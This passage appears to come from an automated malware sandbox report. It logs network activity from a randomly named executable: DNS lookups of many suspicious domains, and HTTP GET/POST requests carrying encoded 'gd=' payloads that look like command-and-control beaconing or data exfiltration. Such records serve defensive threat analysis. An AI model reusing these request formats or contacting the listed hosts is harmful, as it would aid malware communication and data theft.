                  Sep 14, 2024 11:12:51.029772997 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:51.029807091 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:51.029819012 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:51.029984951 CEST8049760162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:51.030011892 CEST4976080192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:51.030102968 CEST4976080192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:51.832070112 CEST4976080192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:52.851737022 CEST4976180192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:52.856689930 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:52.856767893 CEST4976180192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:52.866863966 CEST4976180192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:52.873395920 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.457520008 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.457551956 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.457582951 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.457593918 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.457607985 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.457606077 CEST4976180192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:53.457627058 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.457643032 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.457653999 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.457653046 CEST4976180192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:53.457663059 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.457674980 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.457711935 CEST4976180192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:53.457741976 CEST4976180192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:53.462788105 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.462836981 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.462846994 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.462860107 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.462877035 CEST4976180192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:53.462940931 CEST4976180192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:53.545783997 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.545835018 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.545844078 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.545854092 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.545919895 CEST4976180192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:53.545958996 CEST4976180192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:53.546057940 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:12:53.546104908 CEST4976180192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:53.550491095 CEST4976180192.168.2.4162.0.239.141
                  Sep 14, 2024 11:12:53.555361032 CEST8049761162.0.239.141192.168.2.4
                  Sep 14, 2024 11:13:06.661948919 CEST4976280192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:06.666775942 CEST804976284.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:06.667754889 CEST4976280192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:06.679667950 CEST4976280192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:06.684549093 CEST804976284.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:07.153400898 CEST804976284.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:07.153461933 CEST4976280192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:08.191371918 CEST4976280192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:08.196346998 CEST804976284.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:09.210674047 CEST4976380192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:09.215630054 CEST804976384.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:09.215706110 CEST4976380192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:09.228080988 CEST4976380192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:09.232949018 CEST804976384.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:09.671035051 CEST804976384.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:09.671093941 CEST4976380192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:10.738254070 CEST4976380192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:10.743199110 CEST804976384.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:11.756777048 CEST4976480192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:11.763004065 CEST804976484.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:11.763081074 CEST4976480192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:11.773127079 CEST4976480192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:11.778156042 CEST804976484.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:11.778187990 CEST804976484.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:11.778242111 CEST804976484.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:11.778254032 CEST804976484.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:11.778264999 CEST804976484.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:11.778276920 CEST804976484.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:11.778296947 CEST804976484.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:11.778309107 CEST804976484.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:11.778320074 CEST804976484.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:12.238394022 CEST804976484.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:12.239819050 CEST4976480192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:13.377696037 CEST4976480192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:13.382667065 CEST804976484.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:14.383676052 CEST4976580192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:14.388602972 CEST804976584.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:14.388792992 CEST4976580192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:14.399672031 CEST4976580192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:14.404534101 CEST804976584.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:14.891726017 CEST804976584.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:14.891815901 CEST804976584.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:14.891834021 CEST804976584.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:14.891849041 CEST804976584.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:14.891864061 CEST804976584.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:14.891877890 CEST804976584.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:14.891892910 CEST804976584.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:14.891906977 CEST804976584.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:14.891921997 CEST804976584.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:14.891931057 CEST4976580192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:14.891932011 CEST4976580192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:14.891947031 CEST804976584.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:14.891971111 CEST4976580192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:14.891994953 CEST4976580192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:14.892076015 CEST804976584.32.84.32192.168.2.4
                  Sep 14, 2024 11:13:14.892179966 CEST4976580192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:14.896121025 CEST4976580192.168.2.484.32.84.32
                  Sep 14, 2024 11:13:14.900942087 CEST804976584.32.84.32192.168.2.4

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Sep 14, 2024 11:11:04.888264894 CEST5644553192.168.2.41.1.1.1
                  Sep 14, 2024 11:11:04.924459934 CEST53564451.1.1.1192.168.2.4
                  Sep 14, 2024 11:11:09.946341991 CEST5288853192.168.2.41.1.1.1
                  Sep 14, 2024 11:11:10.956917048 CEST5288853192.168.2.41.1.1.1
                  Sep 14, 2024 11:11:11.575210094 CEST53528881.1.1.1192.168.2.4
                  Sep 14, 2024 11:11:11.575228930 CEST53528881.1.1.1192.168.2.4
                  Sep 14, 2024 11:11:28.006645918 CEST5677253192.168.2.41.1.1.1
                  Sep 14, 2024 11:11:28.568342924 CEST53567721.1.1.1192.168.2.4
                  Sep 14, 2024 11:11:42.131496906 CEST5576353192.168.2.41.1.1.1
                  Sep 14, 2024 11:11:42.385333061 CEST53557631.1.1.1192.168.2.4
                  Sep 14, 2024 11:11:55.633424997 CEST5259353192.168.2.41.1.1.1
                  Sep 14, 2024 11:11:56.315817118 CEST53525931.1.1.1192.168.2.4
                  Sep 14, 2024 11:12:10.009664059 CEST6203653192.168.2.41.1.1.1
                  Sep 14, 2024 11:12:10.634450912 CEST53620361.1.1.1192.168.2.4
                  Sep 14, 2024 11:12:23.789719105 CEST6344353192.168.2.41.1.1.1
                  Sep 14, 2024 11:12:23.799879074 CEST53634431.1.1.1192.168.2.4
                  Sep 14, 2024 11:12:31.870064020 CEST5754053192.168.2.41.1.1.1
                  Sep 14, 2024 11:12:32.011194944 CEST53575401.1.1.1192.168.2.4
                  Sep 14, 2024 11:12:45.163578987 CEST5798753192.168.2.41.1.1.1
                  Sep 14, 2024 11:12:45.207256079 CEST53579871.1.1.1192.168.2.4
                  Sep 14, 2024 11:12:58.555664062 CEST6502353192.168.2.41.1.1.1
                  Sep 14, 2024 11:12:58.564555883 CEST53650231.1.1.1192.168.2.4
                  Sep 14, 2024 11:13:06.631799936 CEST5710353192.168.2.41.1.1.1
                  Sep 14, 2024 11:13:06.659496069 CEST53571031.1.1.1192.168.2.4
                  Sep 14, 2024 11:13:20.303826094 CEST5884453192.168.2.41.1.1.1
                  Sep 14, 2024 11:13:20.823889017 CEST53588441.1.1.1192.168.2.4

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Sep 14, 2024 11:11:04.888264894 CEST192.168.2.41.1.1.10x9c09Standard query (0)www.linkbasic.netA (IP address)IN (0x0001)false
                  Sep 14, 2024 11:11:09.946341991 CEST192.168.2.41.1.1.10x8023Standard query (0)www.chamadaslotgiris.netA (IP address)IN (0x0001)false
                  Sep 14, 2024 11:11:10.956917048 CEST192.168.2.41.1.1.10x8023Standard query (0)www.chamadaslotgiris.netA (IP address)IN (0x0001)false
                  Sep 14, 2024 11:11:28.006645918 CEST192.168.2.41.1.1.10xca7bStandard query (0)www.masteriocp.onlineA (IP address)IN (0x0001)false
                  Sep 14, 2024 11:11:42.131496906 CEST192.168.2.41.1.1.10x2495Standard query (0)www.mediaplug.bizA (IP address)IN (0x0001)false
                  Sep 14, 2024 11:11:55.633424997 CEST192.168.2.41.1.1.10xb490Standard query (0)www.independent200.orgA (IP address)IN (0x0001)false
                  Sep 14, 2024 11:12:10.009664059 CEST192.168.2.41.1.1.10x6fa3Standard query (0)www.tigre777gg.onlineA (IP address)IN (0x0001)false
                  Sep 14, 2024 11:12:23.789719105 CEST192.168.2.41.1.1.10xc6a4Standard query (0)www.monos.shopA (IP address)IN (0x0001)false
                  Sep 14, 2024 11:12:31.870064020 CEST192.168.2.41.1.1.10x82a0Standard query (0)www.personal-loans-jp8.xyzA (IP address)IN (0x0001)false
                  Sep 14, 2024 11:12:45.163578987 CEST192.168.2.41.1.1.10xfe66Standard query (0)www.quantumnests.xyzA (IP address)IN (0x0001)false
                  Sep 14, 2024 11:12:58.555664062 CEST192.168.2.41.1.1.10x225fStandard query (0)www.abbabyfernando.onlineA (IP address)IN (0x0001)false
                  Sep 14, 2024 11:13:06.631799936 CEST192.168.2.41.1.1.10xf183Standard query (0)www.parcelfly.netA (IP address)IN (0x0001)false
                  Sep 14, 2024 11:13:20.303826094 CEST192.168.2.41.1.1.10x77dcStandard query (0)www.siyue.xyzA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Sep 14, 2024 11:11:04.924459934 CEST1.1.1.1192.168.2.40x9c09Name error (3)www.linkbasic.netnonenoneA (IP address)IN (0x0001)false
                  Sep 14, 2024 11:11:11.575210094 CEST1.1.1.1192.168.2.40x8023No error (0)www.chamadaslotgiris.netchamadaslotgiris.netCNAME (Canonical name)IN (0x0001)false
                  Sep 14, 2024 11:11:11.575210094 CEST1.1.1.1192.168.2.40x8023No error (0)chamadaslotgiris.net3.33.130.190A (IP address)IN (0x0001)false
                  Sep 14, 2024 11:11:11.575210094 CEST1.1.1.1192.168.2.40x8023No error (0)chamadaslotgiris.net15.197.148.33A (IP address)IN (0x0001)false
                  Sep 14, 2024 11:11:11.575228930 CEST1.1.1.1192.168.2.40x8023No error (0)www.chamadaslotgiris.netchamadaslotgiris.netCNAME (Canonical name)IN (0x0001)false
                  Sep 14, 2024 11:11:11.575228930 CEST1.1.1.1192.168.2.40x8023No error (0)chamadaslotgiris.net3.33.130.190A (IP address)IN (0x0001)false
                  Sep 14, 2024 11:11:11.575228930 CEST1.1.1.1192.168.2.40x8023No error (0)chamadaslotgiris.net15.197.148.33A (IP address)IN (0x0001)false
                  Sep 14, 2024 11:11:28.568342924 CEST1.1.1.1192.168.2.40xca7bNo error (0)www.masteriocp.onlinedns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                  Sep 14, 2024 11:11:28.568342924 CEST1.1.1.1192.168.2.40xca7bNo error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                  Sep 14, 2024 11:11:28.568342924 CEST1.1.1.1192.168.2.40xca7bNo error (0)dns.ladipage.com54.179.173.60A (IP address)IN (0x0001)false
                  Sep 14, 2024 11:11:28.568342924 CEST1.1.1.1192.168.2.40xca7bNo error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                  Sep 14, 2024 11:11:42.385333061 CEST1.1.1.1192.168.2.40x2495No error (0)www.mediaplug.biz66.81.203.10A (IP address)IN (0x0001)false
                  Sep 14, 2024 11:11:42.385333061 CEST1.1.1.1192.168.2.40x2495No error (0)www.mediaplug.biz66.81.203.135A (IP address)IN (0x0001)false
                  Sep 14, 2024 11:11:42.385333061 CEST1.1.1.1192.168.2.40x2495No error (0)www.mediaplug.biz66.81.203.200A (IP address)IN (0x0001)false
                  Sep 14, 2024 11:11:56.315817118 CEST1.1.1.1192.168.2.40xb490No error (0)www.independent200.org103.42.108.46A (IP address)IN (0x0001)false
                  Sep 14, 2024 11:12:10.634450912 CEST1.1.1.1192.168.2.40x6fa3No error (0)www.tigre777gg.onlinetigre777gg.onlineCNAME (Canonical name)IN (0x0001)false
                  Sep 14, 2024 11:12:10.634450912 CEST1.1.1.1192.168.2.40x6fa3No error (0)tigre777gg.online3.33.130.190A (IP address)IN (0x0001)false
                  Sep 14, 2024 11:12:10.634450912 CEST1.1.1.1192.168.2.40x6fa3No error (0)tigre777gg.online15.197.148.33A (IP address)IN (0x0001)false
                  Sep 14, 2024 11:12:23.799879074 CEST1.1.1.1192.168.2.40xc6a4Name error (3)www.monos.shopnonenoneA (IP address)IN (0x0001)false
                  Sep 14, 2024 11:12:32.011194944 CEST1.1.1.1192.168.2.40x82a0No error (0)www.personal-loans-jp8.xyz199.59.243.226A (IP address)IN (0x0001)false
                  Sep 14, 2024 11:12:45.207256079 CEST1.1.1.1192.168.2.40xfe66No error (0)www.quantumnests.xyz162.0.239.141A (IP address)IN (0x0001)false
                  Sep 14, 2024 11:12:58.564555883 CEST1.1.1.1192.168.2.40x225fName error (3)www.abbabyfernando.onlinenonenoneA (IP address)IN (0x0001)false
                  Sep 14, 2024 11:13:06.659496069 CEST1.1.1.1192.168.2.40xf183No error (0)www.parcelfly.netparcelfly.netCNAME (Canonical name)IN (0x0001)false
                  Sep 14, 2024 11:13:06.659496069 CEST1.1.1.1192.168.2.40xf183No error (0)parcelfly.net84.32.84.32A (IP address)IN (0x0001)false

                  HTTP Request Dependency Graph

                  • www.chamadaslotgiris.net
                  • www.masteriocp.online
                  • www.mediaplug.biz
                  • www.independent200.org
                  • www.tigre777gg.online
                  • www.personal-loans-jp8.xyz
                  • www.quantumnests.xyz
                  • www.parcelfly.net

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.4497373.33.130.190803272C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  TimestampBytes transferredDirectionData
                  Sep 14, 2024 11:11:11.594907045 CEST518OUTGET /gqyt/?gd=NZeSp/M8BkILDmxs2B7hIlXbpVtCmEXRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQyiHNH7DPloLfSnGllCxy50DD/tOn/niLsxIk=&a0=_6Edzvj0xtFLdH HTTP/1.1
                  Host: www.chamadaslotgiris.net
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Sep 14, 2024 11:11:12.967840910 CEST396INHTTP/1.1 200 OK
                  Server: openresty
                  Date: Sat, 14 Sep 2024 09:11:12 GMT
                  Content-Type: text/html
                  Content-Length: 256
                  Connection: close
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 67 64 3d 4e 5a 65 53 70 2f 4d 38 42 6b 49 4c 44 6d 78 73 32 42 37 68 49 6c 58 62 70 56 74 43 6d 45 58 52 47 69 66 7a 30 2f 74 6d 56 69 32 62 31 6f 56 4f 35 4e 65 48 65 4c 32 75 6c 7a 4f 6e 66 34 49 79 32 63 74 6a 45 76 53 38 33 34 77 30 35 67 4d 73 36 4d 51 79 69 48 4e 48 37 44 50 6c 6f 4c 66 53 6e 47 6c 6c 43 78 79 35 30 44 44 2f 74 4f 6e 2f 6e 69 4c 73 78 49 6b 3d 26 61 30 3d 5f 36 45 64 7a 76 6a 30 78 74 46 4c 64 48 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?gd=NZeSp/M8BkILDmxs2B7hIlXbpVtCmEXRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQyiHNH7DPloLfSnGllCxy50DD/tOn/niLsxIk=&a0=_6Edzvj0xtFLdH"}</script></head></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.44973818.139.62.226803272C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  TimestampBytes transferredDirectionData
                  Sep 14, 2024 11:11:28.590806961 CEST787OUTPOST /p5rq/ HTTP/1.1
                  Host: www.masteriocp.online
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 199
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.masteriocp.online
                  Referer: http://www.masteriocp.online/p5rq/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 63 77 46 53 49 69 43 6d 4f 47 62 4e 56 41 32 6d 6d 78 6d 61 55 48 49 78 68 4c 70 74 77 55 35 72 38 72 79 6f 48 6b 79 76 70 7a 4a 33 76 2f 41 74 77 37 43 61 6b 78 4a 79 76 41 52 65 68 4c 4a 7a 7a 48 61 4d 4d 50 61 55 54 66 5a 6e 78 59 4b 2f 65 65 41 32 58 6d 30 61 5a 79 46 2f 45 50 64 2b 76 38 4e 6b 6d 48 63 52 4f 41 42 32 48 4a 6d 54 68 64 42 70 74 46 53 6b 79 31 46 56 37 4a 2f 54 73 5a 72 77 54 6f 67 65 66 70 64 38 61 35 32 6e 2b 37 47 43 52 38 73 4e 7a 4d 30 56 4b 6d 6e 37 75 7a 67 70 6e 4e 70 74 51 59 2b 33 76 79 50 2b 33 77 41 68 36 44 78 45 70 6d 5a 61 69 36 2b 53 6f 67 3d 3d
                  Data Ascii: gd=cwFSIiCmOGbNVA2mmxmaUHIxhLptwU5r8ryoHkyvpzJ3v/Atw7CakxJyvARehLJzzHaMMPaUTfZnxYK/eeA2Xm0aZyF/EPd+v8NkmHcROAB2HJmThdBptFSky1FV7J/TsZrwTogefpd8a52n+7GCR8sNzM0VKmn7uzgpnNptQY+3vyP+3wAh6DxEpmZai6+Sog==
                  Sep 14, 2024 11:11:29.516406059 CEST368INHTTP/1.1 301 Moved Permanently
                  Server: openresty
                  Date: Sat, 14 Sep 2024 09:11:29 GMT
                  Content-Type: text/html
                  Content-Length: 166
                  Connection: close
                  Location: https://www.masteriocp.online/p5rq/
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.44973918.139.62.226803272C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  TimestampBytes transferredDirectionData
                  Sep 14, 2024 11:11:31.131051064 CEST807OUTPOST /p5rq/ HTTP/1.1
                  Host: www.masteriocp.online
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 219
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.masteriocp.online
                  Referer: http://www.masteriocp.online/p5rq/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 63 77 46 53 49 69 43 6d 4f 47 62 4e 48 54 2b 6d 6b 53 4f 61 46 33 49 32 6b 4c 70 74 70 45 35 76 38 72 32 6f 48 6c 33 6b 6f 48 6c 33 76 61 38 74 69 75 75 61 74 68 4a 79 67 67 52 48 76 72 4a 6f 7a 47 6d 45 4d 50 57 55 54 66 4e 6e 78 59 61 2f 64 70 63 35 55 57 30 59 51 53 46 35 4c 76 64 2b 76 38 4e 6b 6d 48 49 33 4f 45 6c 32 48 36 75 54 75 5a 64 71 75 46 53 6e 6d 6c 46 56 2f 4a 2b 61 73 5a 71 64 54 74 49 6b 66 76 5a 38 61 34 47 6e 2f 71 47 42 62 38 73 50 33 4d 31 48 4f 6c 32 67 32 78 56 2b 34 76 70 63 5a 39 61 58 6a 55 65 6b 6d 42 68 32 6f 44 56 33 30 68 51 75 76 35 44 62 7a 6e 77 52 56 41 71 6a 71 36 69 79 31 75 37 51 2f 4d 68 6a 54 78 30 3d
                  Data Ascii: gd=cwFSIiCmOGbNHT+mkSOaF3I2kLptpE5v8r2oHl3koHl3va8tiuuathJyggRHvrJozGmEMPWUTfNnxYa/dpc5UW0YQSF5Lvd+v8NkmHI3OEl2H6uTuZdquFSnmlFV/J+asZqdTtIkfvZ8a4Gn/qGBb8sP3M1HOl2g2xV+4vpcZ9aXjUekmBh2oDV30hQuv5DbznwRVAqjq6iy1u7Q/MhjTx0=
                  Sep 14, 2024 11:11:32.058912039 CEST368INHTTP/1.1 301 Moved Permanently
                  Server: openresty
                  Date: Sat, 14 Sep 2024 09:11:31 GMT
                  Content-Type: text/html
                  Content-Length: 166
                  Connection: close
                  Location: https://www.masteriocp.online/p5rq/
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.44974018.139.62.226803272C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  TimestampBytes transferredDirectionData
                  Sep 14, 2024 11:11:33.677061081 CEST10889OUTPOST /p5rq/ HTTP/1.1
                  Host: www.masteriocp.online
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 10299
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.masteriocp.online
                  Referer: http://www.masteriocp.online/p5rq/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 63 77 46 53 49 69 43 6d 4f 47 62 4e 48 54 2b 6d 6b 53 4f 61 46 33 49 32 6b 4c 70 74 70 45 35 76 38 72 32 6f 48 6c 33 6b 6f 48 74 33 76 73 6f 74 77 5a 61 61 2f 78 4a 79 74 41 52 43 76 72 49 36 7a 48 4f 36 4d 50 4c 6a 54 63 31 6e 7a 36 69 2f 59 63 6f 35 44 47 30 59 50 43 46 34 45 50 64 72 76 39 68 37 6d 48 59 33 4f 45 6c 32 48 37 65 54 6e 74 42 71 69 6c 53 6b 79 31 46 6a 37 4a 2b 79 73 5a 7a 6f 54 74 45 30 66 38 52 38 61 59 57 6e 39 59 2b 42 58 38 73 33 77 4d 30 43 4f 6c 36 46 32 78 4a 79 34 75 4e 36 5a 37 6d 58 31 7a 37 74 69 68 68 68 79 43 6c 6f 68 77 6b 61 6f 6f 6a 57 79 30 38 49 44 51 4b 74 35 4f 71 75 37 35 71 59 74 35 39 59 4f 58 77 33 30 65 41 41 72 74 77 64 35 58 62 63 7a 47 74 6f 77 32 74 43 61 42 77 34 68 75 46 41 69 37 59 74 64 61 6a 4a 71 55 68 38 4c 4e 6c 6a 75 62 72 37 6a 47 36 38 46 70 70 34 49 6a 43 55 5a 6a 79 30 73 35 44 53 68 64 6d 44 5a 75 78 6f 6c 4e 79 63 57 74 33 6c 44 58 61 37 78 45 41 37 48 4c 38 41 51 52 34 4d 46 41 39 7a 39 43 6b 69 67 53 68 36 73 64 79 4c 30 68 64 [TRUNCATED]
